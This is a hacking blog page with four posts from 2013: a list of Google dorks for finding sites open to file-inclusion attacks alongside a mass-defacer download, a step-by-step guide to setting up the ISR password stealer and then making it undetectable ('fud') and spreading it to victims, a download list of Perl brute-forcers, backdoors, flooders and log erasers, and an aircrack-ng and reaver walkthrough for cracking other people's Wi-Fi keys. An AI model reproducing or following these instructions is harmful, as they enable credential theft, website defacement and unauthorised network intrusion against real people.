Pages

Sunday, February 17, 2013

Mass defacer


Download link : Mediafire

Virus Scan : https://www.virustotal.com

Some RFI/LFI Dorks

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.ru

allinurl:/index.php?file= site:*.ru


source : www.zero-security.org 

Friday, February 8, 2013

ISR Stealer Tutorial

ISR 0.4
1.Stealers
What is Stealer?
Stealer is basically used for steal the saved cookies in browsers. It only steal The saved Passwords in browsers eg.IE, chrome, firefox, And any massangers.

Tools to use
• IS 6.0 ,6.3
• ISR 0.4 

These are mainly used tools to steal the passwords.
We seen many stealers like istealer6.0 or something like that but now in this these tools are not in use bcoz we seen in logs username password is same. So we can use this upgraded version that is CALLED ISR 0.4 that is ultimate stealer to use..so use this tool to hack the password.
Here Is the tutorial to use it.
What you Need to use it.
1. Domain
2. Hosting
3. My SQL Database
4. Tools eg.ISR 0.4

1.Domain
Purchase a domain or free Doamin’s are also available.
Eg.www.example.com
2.HOSTING
Then you Want Hosting. Hosting is a web space that is used for host your website there with your domain name.
3.My SQL database
That is used to store web site information like blog posts or user information. A MySQL database is the most popular type of relational database on the web today.
4.Tools
That tools is our main part to steal the cookies from victims.

SO let’s start..
First purchase a domain and hosting accoung. OR it’s available in free also.
I am doing this with free domain and free hosting.
Here you go.
1. Go to http://000webhost.com
2. Sign up there with free order.
3. After creating your hosting and domain Go to your cpanel.
After that Create My SQL Database .
1. GO to SQL Database
[Image: isr1.png]

2. Create a database and one database user account.

[Image: isr2.png]

3. After creating Database save this information.


[Image: isr3.png]

• $dbHost = "fdb-1-5.cwahi.net"; //

(1)MySQL host
• $dbUser = "username"; // (3)MySQL username
• $dbPass = "password"; // (4)MySQL password
• $dbDatabase = "username_db1"; // (2)MySQL database name

Then back to cpanel after that
1. Go to file manger.

[Image: isr4.png]

2. Here you want go in public_html

[Image: isr5.png]

3. Here you want to upload some files of our tools that is in PHP 

language.

[Image: isr7.png]

WE are using ISR 0.4

So it’s files are.
• Config.php
• Install.php
• Index.php
• Style.css

So upload these files in your directory.
After that go to your directory .
1. Click on config.php
2. Click on edit.

[Image: isr7.png]

3. Here is window opend.
4. Edit in config.php
• $dbHost = "fdb-1-5.cwahi.net"; // (1)MySQL host
• $dbUser = "username"; // (3)MySQL username
• $dbPass = "password"; // (4)MySQL password
• $dbDatabase = "username_db1"; // (2)MySQL database name

5. Replace these information with your databse information that is you are saved on your pc.
6. In next fields you can see usename password select your username and password. That is required when you want to show your logs.
7. Then click on save and go back to directory.

[Image: isr9.png]

Then go your Domain name eg.www.example.com

1. Then type in url: http://www.example.com/install.php
2. Then click on INSTALL
[Image: isr10.png]
3. After install delete install.php from your hosting.
Here is everything is done with hosting and domain. 
1. Go to your tool That is ISR0.4.exe
2. Open it in url field paste your domain name link here.
Eg. http://www.example.com/index.php
3. Then click on Bulid Serve

[Image: isr12.png]

4. After bulid server bind your file with Anything and make a fud.
5. Spread it….And enjoy it…
6. TO show your logs go to your domain eg.http://www.example.com/index.php
7. Login there with your usename password.
If YOu Wnat to download these all files which You Links is Here.

DOWNLOAD


source : http://anonymouseverywhere.blogspot.com 

Thursday, February 7, 2013

Download Perl Script Collection


Perl Scripting : Perl is one of the most used programming languages around the globe and integrating Perl into applications means flexible and powerful scripting capabilities. The entire behavior and appearance of Irssi can be modified within these Perl scripts. Irssi provides a script archive with many contributed Irssi scripts which provide both useful extra features and the required assistance to make your own scripts.

List :

1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan - Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. netBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL - Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. bluetooth hacking tool
57. SQL insertion crawler
58. binary scanner
59. POP3 Crack (bruteforce)
60. openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server's list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. connect and send commands to remote iport. the tor network is used for anonymity.
106. port scanner sweeper.
107. rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP's of visiors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5::Reverse
114. wordlist tool by mousepad

 
DOWNLOAD HERE - Mediafire.com

 
credit : Balraj Narendra (ICP)

Saturday, February 2, 2013

Hack wireless work 100%


Today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!

I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.

Let's Begin.

Open up a terminal and type:

Quote:airmon-ng


Spoiler (Click to View)


This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1
Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:
Quote:airodump-ng mon0

When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.

Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

You should know start recieving DATA.


To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0
After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0


After a some secondsthis should appear:


 When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap
Now, wait for some minutes and it should give you the PASSWORD! 

The password is:
Quote:EF855844B288E4BB1BA9ADF14D

PA2-PSK Cracking

Reaver

What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:
Quote:airmon-ng
As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0
After that, type:
Quote:airodump-ng mon0 

Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0
If the target AP is vulnerable, it should say:
Quote:WPS Locked: No


Now, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vv

Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND

If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --help
This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'
And here it is!

You should also, remember the PIN.
Quote:WPS PIN: PIN HERE
Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds! 

If you have any questions feel free to comment and/or ardian.izt@gmail.com

credit : saiko01 ( ABH )